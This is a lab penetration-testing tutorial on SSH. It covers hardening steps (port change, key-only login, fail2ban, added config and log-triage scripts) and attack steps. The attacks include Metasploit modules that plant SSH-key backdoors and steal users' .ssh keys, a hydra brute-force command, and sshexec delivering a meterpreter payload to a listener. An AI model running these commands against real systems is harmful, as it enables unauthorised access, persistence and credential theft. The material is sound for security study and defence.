Probing every open port is practically the first step an attacker takes to prepare an attack. Services have to keep their ports open in order to work, yet every open port is a potential entry point, so one must learn to secure a port even while it stays open. In this post we discuss penetration testing of SSH, also known as Secure Shell.
Introduction to SSH
The SSH protocol, also referred to as Secure Shell, is a method for secure and reliable remote login from one computer to another. It offers several options for strong authentication and protects the security and integrity of connections and communications with strong encryption. It is a secure alternative to unprotected login protocols (such as telnet and rlogin) and insecure file transfer methods (such as FTP).
It is very easy to install and configure the SSH service: we can install it directly from the openssh-server package in the Ubuntu repository. Installing any service requires a root-privileged account; then run the command given below.
apt install openssh-server
When you execute the above command it will extract the package and install the default configuration on the host machine. You can check the open port with the help of the netstat command on the host machine.
SSH Port Scanning
If you don't have direct access to the host machine, use nmap to remotely identify the port state; this is considered the initial step of the penetration test. Here we are going to use Kali Linux to perform the penetration test.
So, to identify an open port on a remote host, we use an nmap version scan, which will not only identify the open port but also grab the service banner, which reveals the installed version of the service.
nmap -sV -p22 192.168.1.103
Methods to Connect SSH
Terminal Command (Linux)
Now execute the following command to access the SSH shell of the remote machine as an authorized user (username: ignite).
Step1: On a Windows client, install putty.exe and run it, then enter the host IP address 192.168.1.103 and port 22, and choose SSH as the connection type.
Step2: A PuTTY session is then generated to establish the connection between the client and the server; it requires login credentials.
By default SSH listens on port 22, which means that if an attacker finds port 22 open he can try attacks against it in order to connect to the host machine. Therefore a system administrator may choose port redirection (port mapping), changing the default port to another one so that connection requests are accepted from the authorized network only.
Follow the below steps for port redirection:
Step1: Edit /etc/ssh/sshd_config using an editor.
Step2: Change Port 22 to Port 2222 and save the file.
Step3: Then restart the ssh service.
Port Redirection Testing
Thus, when we ran the scan again, it showed port 22 CLOSED for ssh and port 2222 OPEN for ssh, as can be seen in the given image.
Establish SSH connection using RSA key
Strong passwords alone are not sufficient to secure the server, because a brute-force attack can still crack them. That's why you need an additional authentication method to secure the SSH server.
SSH key pairs are another essential feature for authenticating clients to the server. A key pair consists of two long strings of characters: a public key and a private key. You place the public key on the server and keep the private key on the client machine; the client unlocks the server by presenting its private key. Once the keys match, the system lets you establish an SSH session automatically, without typing a password.
ssh-keygen is a tool for creating new authentication key pairs for SSH. Such key pairs are used for automating logins, single sign-on, and authenticating hosts.
We will therefore follow these steps to generate a key pair for authenticated connections.
Step1: Run the given command to generate an SSH key pair (id_rsa and id_rsa.pub) on the host machine (Ubuntu).
Step2: Do the same on the client machine that is authorized to establish the connection with the host machine (Ubuntu).
Step3: Once the key pair (id_rsa and id_rsa.pub) has been generated, write the contents of id_rsa.pub into authorized_keys, as shown in the given image.
ssh-keygen
cd .ssh
ls
cat id_rsa.pub > authorized_keys
Step4: Share the authorized_keys file with the host machine by copying it into the .ssh directory.
Step5: Edit /etc/ssh/sshd_config using an editor.
Step6: Uncomment the line “PasswordAuthentication no” so that password authentication is disabled.
As a result, only the authorized machine holding the RSA private key can establish a connection with the host machine, and no password is used.
Now if you try to connect to the SSH server using a username and password, the server will drop your connection request, because it only accepts requests that authenticate with an authorized key.
Step7: Copy the id_rsa key from Kali Linux to the Windows machine in order to establish a connection from the Windows machine using the authorized key.
Step8: Install puttygen.exe.
Step 9: Run puttygen.exe, load id_rsa and choose “save as key”, naming it Key.
Step10: Use putty.exe to connect to the host machine by entering hostname 192.168.1.103 and port 22.
Step11: Navigate to SSH > Auth and browse to the private key you saved in step 9.
This establishes an SSH connection between the Windows client and the server without using a password.
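The port redirection steps and steps 5 and 6 above both edit sshd_config by hand. The shell functions below are an added example, not code from the original post: they apply the same two changes (Port 2222, PasswordAuthentication no, plus an explicit PubkeyAuthentication yes) without leaving duplicate or commented-out directives, and read back the values sshd will actually use. They assume the standard OpenSSH path /etc/ssh/sshd_config and do not handle directives inside Match blocks.

```shell
#!/bin/sh
# Added example (not from the original post): harden sshd_config the way the
# steps above describe, without leaving duplicate or commented-out directives.
# Assumes the standard OpenSSH path /etc/ssh/sshd_config; directives inside
# Match blocks are not handled.

# set_sshd_option FILE KEY VALUE
# sshd honours the first occurrence of a keyword, so every existing "KEY ..."
# line, including the shipped "#KEY ..." default, becomes one "KEY VALUE"
# line; the directive is appended when the file has none.
set_sshd_option() {
    file=$1 key=$2 value=$3
    tmp=$(mktemp) || return 1
    awk -v key="$key" -v value="$value" '
        tolower($1) == tolower(key) || tolower($1) == ("#" tolower(key)) {
            if (!done) { print key " " value; done = 1 }
            next
        }
        { print }
        END { if (!done) print key " " value }
    ' "$file" > "$tmp" && mv "$tmp" "$file"
}

# get_sshd_option FILE KEY: print the value sshd will actually use.
get_sshd_option() {
    awk -v key="$2" 'tolower($1) == tolower(key) { print $2; exit }' "$1"
}

# harden_sshd_config [FILE]: move the listener to port 2222 and accept
# key-based logins only, as in the steps above.
harden_sshd_config() {
    file=${1:-/etc/ssh/sshd_config}
    set_sshd_option "$file" Port 2222 &&
    set_sshd_option "$file" PasswordAuthentication no &&
    set_sshd_option "$file" PubkeyAuthentication yes
}

# Demonstration on a constructed scratch copy, so nothing on the host changes.
demo=$(mktemp)
printf '#Port 22\nPasswordAuthentication yes\nX11Forwarding no\n' > "$demo"
harden_sshd_config "$demo"
printf 'Port=%s PasswordAuthentication=%s PubkeyAuthentication=%s\n' \
    "$(get_sshd_option "$demo" Port)" \
    "$(get_sshd_option "$demo" PasswordAuthentication)" \
    "$(get_sshd_option "$demo" PubkeyAuthentication)"
rm -f "$demo"
```

Run sshd -t to syntax-check the edited file before restarting the service, and keep the current session open until a key-based login on port 2222 has succeeded.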
Exploit SSH with Metasploit
SSH Key Persistence - Post Exploitation
Consider a situation where, by compromising the host machine, you have obtained a meterpreter session and want to leave a permanent backdoor that will give you a connection next time.
This can be achieved with the Metasploit post-exploitation module “SSH Key Persistence” when port 22 is running on the host machine.
This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time.
use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
msf post(sshkey_persistence) > exploit
As can be seen in the given image, it added an authorized key to /home/ignite/.ssh and stored the private key in /root/.msf4/loot.
We confirm this by connecting to the host machine over port 22 using the private key generated above. Here I have renamed the private key to “key” and given it permission 600.
chmod 600 key
ssh -i key ignite@192.168.1.103
Bravo!! It works without any hitch, and in this way we can use an SSH key as a persistent backdoor.
Stealing the SSH key
Consider a situation where, by compromising the host machine, you have obtained a meterpreter session, port 22 is open for SSH, and you want to steal the SSH keys and authorized_keys files. This can be done with the Metasploit post-exploitation module “Multi Gather OpenSSH PKI Credentials Collection”, as discussed below.
This module collects the contents of all users' .ssh directories on the targeted machine. Additionally, known_hosts, authorized_keys and any other files are also downloaded. This module is largely based on firefox_creds.rb.
use post/multi/gather/ssh_creds
msf post(ssh_creds) > set session 1
msf post(ssh_creds) > exploit
From the image given below you can see that we have obtained all the keys stored in the /home/ignite/.ssh directory; they are saved on our local machine under /root/.msf4/loot, and we can now use those keys to log in to the SSH server.
This can also be done manually by downloading the keys directly from /home/ignite/.ssh, as shown in the image below.
We confirm this by connecting to the host machine over port 22 using the private key downloaded above. Let's change the permission of the RSA key; to do this, follow the steps given below.
chmod 600 key
ssh -i key ignite@192.168.1.103
It works without any hitch, and in this way we can use a stolen SSH key as a persistent backdoor.
SSH login using pubkey
Suppose you have the id_rsa key of the host machine and want to obtain a meterpreter session via Metasploit; this can be achieved with the help of the following module.
This module will test ssh logins on a range of machines using a defined private key file and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Key files may be a single private key or several private keys in a single directory.
use auxiliary/scanner/ssh/ssh_login_pubkey
auxiliary(scanner/ssh/ssh_login_pubkey) > set rhosts 192.168.1.103
auxiliary(scanner/ssh/ssh_login_pubkey) > set username ignite
auxiliary(scanner/ssh/ssh_login_pubkey) > set key_path /root/.ssh/id_rsa
auxiliary(scanner/ssh/ssh_login_pubkey) > exploit
This gives a command shell session, which can be upgraded to a meterpreter session by executing the following command.
sessions -u 1
SSH Password cracking
While performing penetration testing on SSH we can run a brute-force attack to guess the password, or to test the lockout threshold policy. It requires a dictionary of usernames and a password list; here we have a username dictionary “user.txt” and a password list “pass.txt”, and we perform the brute-force attack with the help of hydra.
hydra -L user.txt -P pass.txt 192.168.1.103 ssh
As a result, you can observe that the host machine has no defence against brute-force attacks, and we were able to obtain SSH credentials.
To protect your service against brute-force attacks you can use fail2ban, which is an IPS. Read more here about setting up fail2ban in the network.
If you observe the image given below, you can see that this time the host machine drops the connection requests when we try to launch a brute-force attack.
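The hydra run and the fail2ban ban above both leave a clear trail in the sshd log. The shell functions below are an added example, not part of the original post: they count failed password attempts per source address and apply a fail2ban-style retry threshold (fail2ban's default maxretry is 5), and separately flag any source that eventually logged in after failing, which is what a successful brute force looks like in the log. The log lines are constructed sample data.

```shell
#!/bin/sh
# Added example (not from the original post): triage SSH brute-force activity
# from sshd log lines. The lines below are constructed sample data.
SAMPLE_AUTH_LOG='Mar  3 10:01:11 ubuntu sshd[1201]: Failed password for invalid user admin from 192.168.1.107 port 51022 ssh2
Mar  3 10:01:12 ubuntu sshd[1201]: Failed password for invalid user admin from 192.168.1.107 port 51024 ssh2
Mar  3 10:01:13 ubuntu sshd[1205]: Failed password for ignite from 192.168.1.107 port 51030 ssh2
Mar  3 10:01:14 ubuntu sshd[1207]: Failed password for root from 192.168.1.107 port 51031 ssh2
Mar  3 10:01:15 ubuntu sshd[1209]: Failed password for ignite from 192.168.1.107 port 51033 ssh2
Mar  3 10:01:20 ubuntu sshd[1211]: Accepted password for ignite from 192.168.1.107 port 51040 ssh2
Mar  3 10:05:02 ubuntu sshd[1300]: Failed password for ignite from 192.168.1.50 port 40001 ssh2
Mar  3 10:06:40 ubuntu sshd[1302]: Accepted publickey for ignite from 192.168.1.50 port 40010 ssh2: RSA SHA256:CONSTRUCTEDFINGERPRINT'

# failed_logins_by_source [THRESHOLD]
# Reads sshd log lines on stdin and prints "IP COUNT" for every source with at
# least THRESHOLD failed password attempts (default 5, fail2ban's maxretry),
# busiest source first. The "from" token is located by name rather than by
# column because "invalid user" lines shift the field positions.
failed_logins_by_source() {
    awk -v threshold="${1:-5}" '
        /sshd\[[0-9]+\]: Failed password for / {
            for (i = 1; i <= NF; i++) if ($i == "from") { fails[$(i+1)]++; break }
        }
        END { for (ip in fails) if (fails[ip] >= threshold) print ip, fails[ip] }
    ' | sort -k2,2nr
}

# success_after_failures
# Prints "IP USER" for every accepted login whose source address had failed
# earlier in the log: the pattern that separates a brute force that worked
# (or a user mistyping a password) from background noise, and the first
# thing to review after a hydra run like the one above.
success_after_failures() {
    awk '
        /Failed password for / {
            for (i = 1; i <= NF; i++) if ($i == "from") { fails[$(i+1)]++; break }
        }
        /Accepted (password|publickey) for / {
            for (i = 1; i <= NF; i++) if ($i == "from" && fails[$(i+1)] > 0) print $(i+1), $(i-1)
        }
    '
}

# Demonstration on the constructed sample.
echo "Sources at or above the fail2ban-style threshold:"
printf '%s\n' "$SAMPLE_AUTH_LOG" | failed_logins_by_source 5
echo "Logins that succeeded after earlier failures from the same source:"
printf '%s\n' "$SAMPLE_AUTH_LOG" | success_after_failures
```

On a real host, feed the functions with journalctl -u ssh or /var/log/auth.log instead of the sample string.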
SSH Public Key Login Scanner
This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Key files may be a single private key or several private keys in a single directory. Only a single passphrase is supported, however, so it must either be shared between subject keys or only belong to a single one.
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.1.103
msf auxiliary(ssh_login_pubkey) > set user_file /root/user.txt
msf auxiliary(ssh_login_pubkey) > set key_path /root/.ssh/id_rsa.pub
msf auxiliary(ssh_login_pubkey) > run
As a result, you can observe that user “ignite” is authorized to use this key to connect to the SSH service of the host machine.
SSH User Code Execution
This module connects to the target system and executes the necessary commands to run the specified payload via SSH. If a native payload is specified, an appropriate stager will be used. So we give the host IP along with the username and password, and if everything goes right we get a meterpreter session on our listening machine.
msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) > set rhosts 192.168.1.103
msf exploit(sshexec) > set username ignite
msf exploit(sshexec) > set password 123
msf exploit(sshexec) > set srvhost 192.168.1.107
msf exploit(sshexec) > exploit
As a result, you can observe that we have a meterpreter session on the host machine.
Conclusion: In this post we tried to discuss the possible ways to secure SSH and how to perform penetration testing against such a scenario.